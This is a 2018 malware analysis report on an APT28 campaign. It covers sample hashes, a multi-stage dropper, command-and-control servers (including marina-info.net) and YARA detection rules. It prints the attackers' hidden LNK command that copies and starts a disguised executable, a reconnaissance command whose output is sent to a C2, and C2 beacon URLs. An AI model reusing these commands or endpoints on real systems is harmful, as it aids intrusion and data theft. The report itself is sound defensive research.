# ZLAB ### Malware Analysis Report Operation Roman Holiday – Hunting the Russian APT28 group **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** 13/07/2018 ----- ## Table of Contents Introduction 3 Discovered Samples 5 “87bffb0370c9e14ed5d01d6cc0747cb30a544a71345ea68ef235320378f582ef.exe” 5 “15486216ab9c8b474fe8a773fc46bb37a19c6af47d5bd50f5670cd9950a7207c.exe” 5 “e7dd9678b0a1c4881e80230ac716b21a41757648d71c538417755521438576f6.exe” 5 “e53bd956c4ef79d54b4860e74c68e6d93a49008034afb42b092ea19344309914.exe” 5 “sdbn.dll” 5 “upnphost.exe” 5 The same malware behind four executables 6 upnphost.exe 6 Our submission to VirusTotal 9 AutoIt Script 10 sdbn.dll 11 The attack threat map 14 Yara rules 15 **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- ## Introduction ### Recently, a new series of malware samples were submitted to the major online sandboxes. We noticed one sample submitted to Virus Total that was attributed by some experts to the Russian APT28 group. The APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election. With the help of the researcher that goes online with the Twitter handle Drunk Binary (@DrunkBinary) we obtained a collection of samples to compare with the one we were in possession to discover if we were in presence of a new variant of the infamous APT28 backdoor tracked as X-Agent. The attack we analyzed is multi-stage, an initial dropper malware written in Delphi programming language (a language used by the APT28 in other campaigns) downloads a second stage payload from internet and executes it. The payload communicates to the server using HTTPS protocol, making it impossible to eavesdrop on the malicious traffic it generates. We also analyzed another malicious DLL, apparently unrelated to the previous samples, that presents many similarities with other payloads attributed to the Russian APT group. This malware is particularly interesting for us because it contacts a command and control with the name “marina-info.net” a clear reference to the Italian Military corp, Marina Militare. This lead us into speculating that the malicious code was developed as part of targeted attacks against the Italian Marina Militare, or some other entities associated with it. This last DLL seems to be completely unconnected with the previous samples, but further investigation leads us into believing that it was an additional component used by APT28 in this campaign to compromise the target system. APT28 has a rich arsenal composed of a large number of modular threats and the dll is the component of the X-Agent we analyzed. X-Agent is a persistent payload injected into the victim machine that can be compiled for almost any **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- ### Operating System and can be enhanced by adding new ad-hoc component developed for the specific cyber-attack. In our case, the component was submitted to online sandboxes while the new campaign was ongoing. We cannot exclude that the APT group developed the backdoor to target specific organizations including the Italian Marina Militare or any other subcontractor. In our analysis we were not able to directly connect the malicious dll file to the X-Agent samples, but believe they are both part of a well-coordinated surgical attack powered by APT28. The dll that connect to “marina-info.net” may be the last stage-malware that is triggered only when particular conditions occur, for example when the malware infects a system with an IP address belonging to specific ranges. **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- ## Discovered Samples ### In this section we reports all the sample we analyzed in our investigation. #### “87bffb0370c9e14ed5d01d6cc0747cb30a544a71345ea68ef235320378f582ef.exe” MD5 dc40f11eb6815ca9adea0a3b8ce7262c SHA-1 31875868738792a258c2b38641acf2aac1ac0352 SHA-256 87bffb0370c9e14ed5d01d6cc0747cb30a544a71345ea68ef235320378f582ef File Size 851.07 KB Icon #### “15486216ab9c8b474fe8a773fc46bb37a19c6af47d5bd50f5670cd9950a7207c.exe” MD5 44d5d647016b04a095f3658260eaac72 SHA-1 7cd1b5f6774b25727e1d80b29979dadd1d427d3a SHA-256 15486216ab9c8b474fe8a773fc46bb37a19c6af47d5bd50f5670cd9950a7207c File Size 484 KB Icon #### “e7dd9678b0a1c4881e80230ac716b21a41757648d71c538417755521438576f6.exe” MD5 687464d6c668b59f85b0e02012945fe5 SHA-1 b3086b4d99288d50585d4c07a3fdd0970a9843fc SHA-256 e7dd9678b0a1c4881e80230ac716b21a41757648d71c538417755521438576f6 File Size 1233 KB Icon #### “e53bd956c4ef79d54b4860e74c68e6d93a49008034afb42b092ea19344309914.exe” MD5 75fa78ebe2ccf42ad885c722a78399aa SHA-1 d41aa10a53684317814c4d4397f46757fe218246 SHA-256 e53bd956c4ef79d54b4860e74c68e6d93a49008034afb42b092ea19344309914 File Size 851.07 KB Icon #### “sdbn.dll” MD5 374896a75493a406eb427f35eec86fe5 SHA-1 7fbf5f83f34b8a3531fb1be7eca83167648e7b21 SHA-256 1228e9066819f115e8b2a6c1b75352566a6a5dc002d9d36a8c5b47758c9f6a45 File Size 294 KB #### “upnphost.exe” MD5 edc83f5b08d3d009e60f3700d6a273da **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** |MD5|dc40f11eb6815ca9adea0a3b8ce7262c| |---|---| |SHA-1|31875868738792a258c2b38641acf2aac1ac0352| |SHA-256|87bffb0370c9e14ed5d01d6cc0747cb30a544a71345ea68ef235320378f582ef| |File Size|851.07 KB| |Icon|| |MD5|44d5d647016b04a095f3658260eaac72| |---|---| |SHA-1|7cd1b5f6774b25727e1d80b29979dadd1d427d3a| |SHA-256|15486216ab9c8b474fe8a773fc46bb37a19c6af47d5bd50f5670cd9950a7207c| |File Size|484 KB| |Icon|| |MD5|687464d6c668b59f85b0e02012945fe5| |---|---| |SHA-1|b3086b4d99288d50585d4c07a3fdd0970a9843fc| |SHA-256|e7dd9678b0a1c4881e80230ac716b21a41757648d71c538417755521438576f6| |File Size|1233 KB| |Icon|| |MD5|75fa78ebe2ccf42ad885c722a78399aa| |---|---| |SHA-1|d41aa10a53684317814c4d4397f46757fe218246| |SHA-256|e53bd956c4ef79d54b4860e74c68e6d93a49008034afb42b092ea19344309914| |File Size|851.07 KB| |Icon|| |“sdbn.dll”|Col2| |---|---| |MD5|374896a75493a406eb427f35eec86fe5| |SHA-1|7fbf5f83f34b8a3531fb1be7eca83167648e7b21| |SHA-256|1228e9066819f115e8b2a6c1b75352566a6a5dc002d9d36a8c5b47758c9f6a45| |File Size|294 KB| |MD5|edc83f5b08d3d009e60f3700d6a273da| |---|---| ----- SHA-1 8f338c7afb4346e8fe9f8db289b6fc6a03e68378 SHA-256 d3c30cc8fb8f049ca6d448466f7440e175b53dcdf7d7e769c34693d43d858b06 File Size 378 KB ## The same malware behind four executables ### The first four executables listed in the previous paragraph were used as infection vectors in the new campaign we investigated. The samples appear as different payloads but further basic static analysis allowed us to discover that they are the same malware sample: - The first two samples are identical, with the unique difference that the second one is packed using the UPX tool. Once unpacked it, we have discovered the same payload with also the same hash of the first sample - The third and the fourth ones are the identical too, also in this the difference is that the fourth one is packed using the UPX tool. - We can speculate that we have two different samples, then we were able to extract 2 files from the second family: a classic “.lnk” file and a “jpg” file. _Figure 1 - Extracted files_ ### These files seem to be a classic img and a link, but actually the jpg file is the executable of the second sample and in the link file is hidden the following command: ``` %systemroot%\System32\cmd.exe /c copy 12-033-1589(1).rar C:\Users\Public\12-033-1589(1).exe || copy 12-033-1589(2).jpg C:\Users\Public\12-033-1589(1).exe & start C:\Users\Public\12-0331589(1).exe #### upnphost.exe ### After executing the file, it contacts the IP “45.124.132.127” where it sends periodically some information gathered on the operative system, using the command line “cmd.exe /c tasklist & systeminfo”. ``` **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** |SHA-1|8f338c7afb4346e8fe9f8db289b6fc6a03e68378| |---|---| |SHA-256|d3c30cc8fb8f049ca6d448466f7440e175b53dcdf7d7e769c34693d43d858b06| |File Size|378 KB| ----- ### According to the WHOIS records, the server is located in Hong Kong The information is sent to the command and control through HTTPS communication using a POST method. _Figure 2 - POST traffic sniffed_ **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- ### Once the malware has sent the information about the host configuration to the C2, it will download another file, “upnphost.exe”, stored in the path “%APPDATA%\Local\Temp” that probably is the final payload. Moreover, the executable implements a persistence mechanism by setting the registry key: _Figure 3 - Registry key for persistence mechanism_ ### This other file contacts another command and control “46.183.218.37”, located in Latvia: _Figure 4 - Whois information about 46.183.218.37_ **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- Our submission to VirusTotal ### We also discovered that the “upnphost.exe” file was submitted to Virus Total by us, likely because the evasion technique implemented by the dropper. In order to analyze the dropper, we patched it. Once the patching was applied we was able to analyze the complete malicious behavior of the malware. _Figure 5 - The patch point of the dropper_ ### The malicious code starts contacting the previously mentioned Command and Control and downloads this “upnphost.exe” file. Below the results we obtained submitting the patched version of the binary on VirusTotal: _Figure 6 - VirusTotal score_ **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- AutoIt Script ### The communication with the command and control is managed with a script written in the AutoIt language. This script is embedded in the “upnphost.exe” file as resource, and, when it is launched, it communicates with this other server in HTTPS, sending some information about the victim’s computer. _Figure 7 - Piece of decompiled code_ ### The above figure shows a piece of decompiled code of the AutoIt script, where the IP address and the path, with relative user agent are masqueraded in hexadecimal encoding. After decoding the parameters, we obtain the IP address, the path and the user agent used to contact the C&C and send back the information about the target system. IP https://46.183.218.37/ Path community/wiki-self-signed/name-signed.php User agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 Method POST ### Another peculiarity, is the name of the function where is present the code for the HTTPS communication. It is “checkupdate()” and it seems that the malware is instructed to contact periodically the C&C waiting for new commands. The following picture shows the multi-stage attack: **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** |IP|https://46.183.218.37/| |---|---| |Path|community/wiki-self-signed/name-signed.php| |User agent|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0| |Method|POST| ----- _Figure 8 – The multistage attack scheme._ ## sdbn.dll ### This file was retrieved from the threat intelligence platforms and was flagged as an APT28 sample, such as also the previous files. It is not clear if this sample is connected to the previous ones, but probably it belongs to the same infection campaign because it was uploaded in the same time period on several online sandboxes. Another characteristic in common to the previous files is that, this one is written in Delphi programming language, like also the four initial file droppers. It is rare to find a malware written in Delphi language, but previous investigations conducted by other security firms confirm that the APT28 group already used malware written in this language in past campaigns. The most important evidence emerged from the analysis of the sdbn.dll is that it contacted the domain: “marina-info.net,” a clear reference to the Italian Marina Militare. The domain is resolved in the IP “191.101.31.250” which is located in Holland: **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- _Figure 9 - Whois information about "marina-info.net"_ **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- ### The communication to the C2 is performed also in this case by using the HTTPS protocol. We discovered at least three paths contacted with a custom user agent header: url https://marina-info.net path1 GET /find/?itwm=QAmXUXFS1aBuXMD4VCMCDg9RQWovPrCA2ag==&btnG=44NK&utm= olrlGjBnc&aq=e5f1l6bFE1ef&N-Fl8=321vSxDE7MWll path2 POST /open/?btnG=zoHM&btnG=RZ&utm=Ezm2RitD&aq=U&itwm=040sLB2hPVAXDiAILXHi_ nYDoZpWbFBwoPg==&oprnd=r0&Mxi3=SVfy path3 GET /results/?utm=1V_&oprnd=FTLm7-D&aq=mlKH2SmjAwZjy&itwm=rNOnHdIWmsWfPczLAM1xXdxdqFXHodLoYg== path4 GET /watch/?itwm=BciqsllH-FDRVo0I6ylP_rBbDJqQNP1wZqA==&from=G&utm=JJ_N&oe=a&from=QdbP&TFWn0=dDViXhemoD6 _Table 1 - url and paths discovered_ ### Like the “upnphost.exe” malware, this other executable periodically contacts the command and control waiting for new commands. However, we discovered that the server responds always with 403 Status code Forbidden, also to the requests sent by the malware itself. _Figure 10 - Response from the C2C_ ### This behavior could be the result of a server-side control implemented by the server to allow the requests coming only from particular IP addresses or simply it was intentionally disabled by the attackers likely because they believe to have been uncovered by the victims or by the security firms. It could be a security mechanism implemented by the attackers to make hard the investigation of security firms. Moreover, we decided to further investigate the detection rate of this new file on VirusTotal. When we started our analysis it was zero, this means that the threat was completely undetected and currently the malicious code has a detection rate of 35/65. **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** |url|https://marina-info.net| |---|---| |path1|GET /find/?itwm=QAmXUXFS1aBuXMD4VCMCDg9RQWovPrCA2ag==&btnG=44NK&utm= olrlGjBnc&aq=e5f1l6bFE1ef&N-Fl8=321vSxDE7MWll| |path2|POST /open/?btnG=zoHM&btnG=RZ&utm=Ezm2RitD&aq=U&itwm=040sLB2hPVAXDiAILXHi_ nYDoZpWbFBwoPg==&oprnd=r0&Mxi3=SVfy| |path3|GET /results/?utm=1V_&oprnd=FTLm7-D&aq=mlKH2SmjAwZjy&itwm=rNOn- HdIWmsWfPczLAM1xXdxdqFXHodLoYg==| |path4|GET /watch/?itwm=BciqsllH-FDRVo0I6ylP_rBbDJqQNP1wZqA==&from=G&utm=JJ- _N&oe=a&from=QdbP&TFWn0=dDViXhemoD6| ----- ## The attack threat map ### In this paragraph, we show the threat map with the location of the various IP addressed contacted by the samples we analyzed. _Figure 11 - The ThreatMap_ ### As we can see, the attack surface covered by the hacker group is incredibly wide: there are two different C2Cs in Europe and another one in China to mislead the analysis and this create confusion during the reconstruction of the complete cyber-attack. **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- ## Yara rules ``` import "pe" rule Dropper_APT28XAGENTJuly2018 { meta: description = "Yara Rule for dropper of APT28 XAGENT July2018" author = "CSE CybSec Enterprise - Z-Lab" last_updated = "2018-07-13" tlp = "white" category = "informational" strings: $a = {8B 45 FC 8B 10 FF} $b = {33 2E 34 2D 31 39} condition: (pe.number_of_sections == 9 and pe.sections[3].name == ".bss" and all of them) or (pe.number_of_sections == 3 and pe.sections[0].name == "UPX0" and pe.sections[1].name == "UPX1" and pe.number_of_resources == 70 and pe.resources[61].type == pe.RESOURCE_TYPE_RCDATA and pe.resources[60].type == pe.RESOURCE_TYPE_RCDATA and pe.resources[59].type == pe.RESOURCE_TYPE_RCDATA) } rule FirstPayload_upnphost_APT28XAGENTJuly2018 { meta: description = "Yara Rule for APT28 XAGENT July2018 First Payload" author = "CSE CybSec Enterprise - Z-Lab" last_updated = "2018-07-13" tlp = "white" category = "informational" strings: $a = {56 AB 37 92 E8} $b = {41 75 74 6F 49 74} ``` **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** ----- ``` condition: pe.number_of_resources == 26 and pe.resources[19].type == pe.RESOURCE_TYPE_RCDATA and pe.version_info["FileDescription"] contains "Compatibility" and all of them } rule SecondPayload_sdbn_APT28XAGENTJuly2018 { meta: description = "Yara Rule for APT28 XAGENT July2018 Second Payload sdbn.dll" author = "CSE CybSec Enterprise - Z-Lab" last_updated = "2018-07-13" tlp = "white" category = "informational" strings: $a = {0F BE C9 66 89} $b = {8B EC 83 EC 10} condition: pe.number_of_sections == 6 and pe.number_of_resources == 1 and pe.resources[0].type == pe.RESOURCE_TYPE_VERSION and pe.version_info["ProductName"] contains "Microsoft" and all of them } ``` **CSE CyberSec Enterprise SPA** **Via G.B. Martini 6, Rome, Italy 00100, Italia** **[Email: info@csecybsec.com](mailto:info@csecybsec.com)** **[Website: www.csecybsec.com](http://csecybsec.com/)** -----